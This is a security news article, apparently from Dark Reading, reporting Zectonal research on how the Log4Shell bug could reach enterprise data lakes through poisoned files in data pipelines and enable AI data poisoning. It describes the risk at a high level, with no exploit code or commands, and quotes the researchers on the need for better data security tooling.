Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning — but unfortunately, these are vulnerable to exploitation via the Java Log4Shell vulnerability, researchers have found.
In general, organizations are focused on including as many data points as possible for training an AI or algorithm, with privacy in mind, but too often they skip the security of the data lakes themselves.
According to research by Zectonal, the Log4Shell bug can be triggered once it is ingested through a data pipeline into a target data lake or data repository, bypassing conventional protections such as application firewalls and traditional scanning devices.
As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. An attacker could simply embed the string in a malicious big-data file payload to open a shell in the data lake, launching a data poisoning attack from there, researchers say. And since the big data file with the toxic payload is often encrypted or compressed, the difficulty to detect is much greater.
“The simplicity of the Log4jShell exploit is what makes it so nefarious,” said David Hirko, founder of Zectonal. “This particular attack vector is difficult to monitor and identify as a threat due to the fact that it fits with the normal operations of data pipelines, big data distributed systems and machine learning training algorithms.”
Using RCE exploits to access data lakes
One of the ways to carry out this attack is by targeting vulnerable versions of the no-code, open source extract-transform-load (ETL) software application – one of the most popular data lake filling tools. An attacker could access the ETL service running in a private subnet from the public Internet through a known remote code execution (RCE) exploit, researchers explain in the report.
The Zectonal team put together a working proof-of-concept (PoC) exploit that used this vector and successfully gained remote access to subnet IP addresses that belonged to a virtual private cloud hosted by a public cloud provider.
Although ETL patched the RCE issue last year, the components have been downloaded millions of times and it seems that security teams have been lagging behind in adopting the fix. The Zectonal team was successful in “triggering an RCE exploit for multiple unpatched releases of the ETL software spanning a period of two years,” according to the report, which was shared with Dark Reading ahead of publication.
“This attack vector is not as simple as sending a text string to a web server,” said Hirko, pointing out the need to penetrate the data supply chain. “An attacker would have to compromise a file somewhere upstream and then let it flow into the target data lake. Let’s say you’re considering weather data — you might be able to manipulate a weather sensor file so that it contained this particular string.”
Patches are available for this particular exploit and vulnerability, but there are likely many different ways to perform these types of Log4Shell attacks.
“There are probably many, many previously unknown or undisclosed vulnerabilities that enable the same thing,” Hirko says. “This is one of the first data poisoning-specific attack vectors we’ve seen, but we believe that data poisoning as a subset of AI poisoning will be one of the new attack vectors of the future.”
Real world consequences
So far, Zectonal has not seen such attacks in the wild, but researchers hope the threat is on the radar screens of security teams. Such attacks may be rare, but they can have major consequences. For example, consider the case of autonomous vehicles, which rely on AI and sensors to navigate city streets.
“Car manufacturers train their AI to look at traffic lights, to know when to stop, slow down or go in the classic red, yellow, green format,” explains Hirko. “If you were to start poisoning your data lake that your AI was training, it is possible to manipulate the AI software to behave in unforeseen ways. Perhaps your car is inadvertently being trained to go when the traffic light is red. and stop when it turns green. So that’s the type of attack vector that we suspect we’ll see in the future.”
Security Protection Delay
The risks are becoming more widely known among practitioners, Hirko tells Dark Reading — many of whom understand the danger, but don’t know how to handle it. One of the challenges is the fact that tackling the problem requires a new way of security as well as new tools.
“We were able to send the poisoned payload through a fairly common data pipeline,” Hirko says. “Traditionally, these kinds of files and data pipelines don’t get through your standard front door set of firewalls. How data gets into the enterprise, how data gets into the data lake hasn’t really been part of the classic security posture of deep defense or zero trust. If you’re one of the using major cloud providers, data coming in from an object storage bucket doesn’t necessarily pass through that firewall.”
He adds that the file formats in which these types of attacks can be bundled are relatively new and somewhat obscure — and because they are specific to the big data and AI worlds, they aren’t as easy to scan with typical security tools, which are created to scan documents or spreadsheets.
So for their part, security vendors need to focus on developing different types of products to get that further visibility, he notes.
“Companies look at the quality of the data, components, individual data points — and it just makes sense to look at the security vulnerabilities of that data as well,” Hirko says. “We suspect that data observability will be built into both quality assurance and data security. This is an emerging type of data and AI security domain.”